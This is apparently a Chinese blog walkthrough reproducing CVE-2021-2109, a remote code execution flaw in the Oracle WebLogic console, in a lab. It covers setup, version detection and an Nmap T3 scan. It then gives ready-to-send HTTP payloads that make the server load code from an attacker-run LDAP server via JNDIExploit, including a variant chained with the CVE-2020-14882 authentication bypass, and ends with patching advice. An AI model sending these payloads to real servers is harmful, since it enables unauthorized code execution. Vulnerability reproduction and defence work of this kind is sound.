百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 编程网 > 正文

CVE-2021-2109 Weblogic Server远程代码执行漏洞

yuyutoo 2024-11-27 22:56 3 浏览 0 评论

0x00 简介

WebLogic是美国甲骨文公司出品的一个application server(应用服务器),确切的说是一个基于JAVAEE架构的中间件,WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

0x01 漏洞概述

CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞,经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码,可以配合CVE-2020-14882未授权漏洞执行任意代码。

0x02 影响版本

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

0x03 环境搭建

Java环境配置:

一定要安装jdk1.7

jdk1.7下载链接:http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-windows-x64.exe

具体安装步骤可以自行上网搜索,这里推荐 https://www.runoob.com/java/java-environment-setup.html , 里面也有jdk下载的官网地址,安装jdk时安装路径最好全英文无空格,安装完后配置环境变量。

如果不安装jdk1.7,后续配置步骤则会遇到如下错误,

安装完Weblogic后打开WebLogic Scripting Tool时可以看到如下报错!

这是由于我们下载安装的weblogic10.3.6版本最高只支持 jdk1.7,而我们给weblogic配置的是1.8版本,

如果已装有jdk1.7,则直接执行以下步骤,没装jdk1.7但已使用jdk1.8安装了weblogic,则在安装完jdk1.7后执行以下步骤

将weblogic安装目录下C:\Oracle\Middleware\wlserver_10.3\common\bin\commEnv.cmd 文件中的。

@rem Reset JAVA Home
set  JAVA_HOME=C:\Java\jdk1.8.0_212
FOR %%i IN ("%JAVA_HOME%") DO SET JAVA_HOME=%%~fsi

修改为

@rem Reset JAVA Home
set  JAVA_HOME=C:\Java\jdk1.7.0
FOR %%i IN ("%JAVA_HOME%") DO SET JAVA_HOME=%%~fsi

保存后双击运行即完成配置修改。

安装配置Weblogic Server(Windows):

Weblogic Server下载链接:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

页面最底下点击下载10.3.6版本(997M),下载完成后将安装程序放到靶机并运行

具体安装和配置步骤参考以下链接,

https://wenku.baidu.com/link?url=SXkEsiMcpfqhM3IdT5ZZ97aNTmwfO_74dvJoNSWoCp2FIyudzpd1uBSgh2ccFJS6N5Kbn0KKPT-KVRkMlsmgRch9YSJ7fDjag1GWxE7cEfy

只需要完成WebLogic安装步骤即可,配置步骤在本次复现中无需进行。

启动WebLogic并输入用户名密码

访问 http://127.0.0.1:7001/console/ 登录

0x04 漏洞复现

1.本地漏洞检测

行指令查看版本信息

cd /Oracle/Middleware/wlserver_10.3/server/lib
java -cp weblogic.jar weblogic.version

没有显示打补丁的信息则存在漏洞

2.使用Nmap进行远程漏洞扫描

可以通过访问控制台登录页 (/console/login/LoginForm.jsp) 看底部版本号,但是该页面很可能被删除或无法访问,此时可以通过Nmap自带的针对WebLogic的扫描脚本来进行版本探测,Nmap会发送T3协议的数据包,并从返回包中的HELO信息获取weblogic的版本.

nmap -n -v -Pn -sV 192.168.50.0/24 -p 7001,7002 --script=weblogic-t3-info.nse

扫描结果显示192.168.50.139目标靶机开启了7001端口的T3协议

同时WebLogic Server的版本为10.3.6,在CVE-2021-2109影响范围内

3.feihong-cs 版EXP

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

下载编译好的jar包后执行指令来启动LDAP和HTTP服务(-i 选项后接本机IP)

java -jar JNDIExploit-v1.11.jar -i 192.168.50.139

启动后无内容,此时已经打开HTTP和LDAP服务,如果接收到LDAP的请求就会打印出内容并处理,

打开Burpsuite的Repeater模块,填入并修改payload,

POST /console/consolejndi.portal HTTP/1.1
Host: 192.168.50.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: ADMINCONSOLESESSION=1w6DgCLLkQhPRBqkQthhQvPqpT4SvTl22rSjK3kRHxw0WHLhnzG1!-766673213
Connection: close
Content-Length: 176
cmd:whoami

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.50;139:1389/Basic/WeblogicEcho;AdminServer%22)

点击 Send 发送payload

服务端接收到payload,执行并返回结果

4.配合使用未授权漏洞

POST /console/css/%252e%252e/consolejndi.portal  HTTP/1.1
Host: 192.168.50.139:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 177
Connection: close

?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.50;139:1389/Basic/WeblogicEcho;AdminServer%22)

0x05 修复建议

1.升级Weblogic Server运行环境的JDK版本;

2.禁用T3协议, 进入Weblogic控制台,在base_domain配置页点击“安全”选项卡 -> “筛选器”,配置筛选器,在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s;

3.使用Weblogic Server官方提供的安全补丁进行修复,https://www.oracle.com/security-alerts/cpujan2021.html;

4.临时关闭后台/console/console.portal对外访问;

5.禁止启用IIOP,登陆Weblogic控制台,找到启用IIOP选项,取消勾选并重启.



相关推荐

史上最全的浏览器兼容性问题和解决方案

微信ID:WEB_wysj(点击关注)◎◎◎◎◎◎◎◎◎一┳═┻︻▄(页底留言开放,欢迎来吐槽)●●●...

平面设计基础知识_平面设计基础知识实验收获与总结
平面设计基础知识_平面设计基础知识实验收获与总结

CSS构造颜色,背景与图像1.使用span更好的控制文本中局部区域的文本:文本;2.使用display属性提供区块转变:display:inline(是内联的...

2025-02-21 16:01 yuyutoo

写作排版简单三步就行-工具篇_作文排版模板

和我们工作中日常word排版内部交流不同,这篇教程介绍的写作排版主要是用于“微信公众号、头条号”网络展示。写作展现的是我的思考,排版是让写作在网格上更好地展现。在写作上花费时间是有累积复利优势的,在排...

写一个2048的游戏_2048小游戏功能实现

1.创建HTML文件1.打开一个文本编辑器,例如Notepad++、SublimeText、VisualStudioCode等。2.将以下HTML代码复制并粘贴到文本编辑器中:html...

今天你穿“短袖”了吗?青岛最高23℃!接下来几天气温更刺激……

  最近的天气暖和得让很多小伙伴们喊“热”!!!  昨天的气温到底升得有多高呢?你家有没有榜上有名?...

CSS不规则卡片,纯CSS制作优惠券样式,CSS实现锯齿样式

之前也有写过CSS优惠券样式《CSS3径向渐变实现优惠券波浪造型》,这次再来温习一遍,并且将更为详细的讲解,从布局到具体样式说明,最后定义CSS变量,自定义主题颜色。布局...

柠檬科技肖勃飞:大数据风控助力信用社会建设

...

你的自我界限够强大吗?_你的自我界限够强大吗英文

我的结果:A、该设立新的界限...

行内元素与块级元素,以及区别_行内元素和块级元素有什么区别?

行内元素与块级元素首先,CSS规范规定,每个元素都有display属性,确定该元素的类型,每个元素都有默认的display值,分别为块级(block)、行内(inline)。块级元素:(以下列举比较常...

让“成都速度”跑得潇潇洒洒,地上地下共享轨交繁华
让“成都速度”跑得潇潇洒洒,地上地下共享轨交繁华

去年的两会期间,习近平总书记在参加人大会议四川代表团审议时,对治蜀兴川提出了明确要求,指明了前行方向,并带来了“祝四川人民的生活越来越安逸”的美好祝福。又是一年...

2025-02-21 16:00 yuyutoo

今年国家综合性消防救援队伍计划招录消防员15000名

记者24日从应急管理部获悉,国家综合性消防救援队伍2023年消防员招录工作已正式启动。今年共计划招录消防员15000名,其中高校应届毕业生5000名、退役士兵5000名、社会青年5000名。本次招录的...

一起盘点最新 Chrome v133 的5大主流特性 ?

1.CSS的高级attr()方法CSSattr()函数是CSSLevel5中用于检索DOM元素的属性值并将其用于CSS属性值,类似于var()函数替换自定义属性值的方式。...

竞走团体世锦赛5月太仓举行 世界冠军杨家玉担任形象大使

style="text-align:center;"data-mce-style="text-align:...

学物理能做什么?_学物理能做什么 卢昌海

作者:曹则贤中国科学院物理研究所原标题:《物理学:ASourceofPowerforMan》在2006年中央电视台《对话》栏目的某期节目中,主持人问过我一个的问题:“学物理的人,如果日后不...

你不知道的关于这只眯眼兔的6个小秘密
你不知道的关于这只眯眼兔的6个小秘密

在你们忙着给熊本君做表情包的时候,要知道,最先在网络上引起轰动的可是这只脸上只有两条缝的兔子——兔斯基。今年,它更是迎来了自己的10岁生日。①关于德艺双馨“老艺...

2025-02-21 16:00 yuyutoo

取消回复欢迎 发表评论: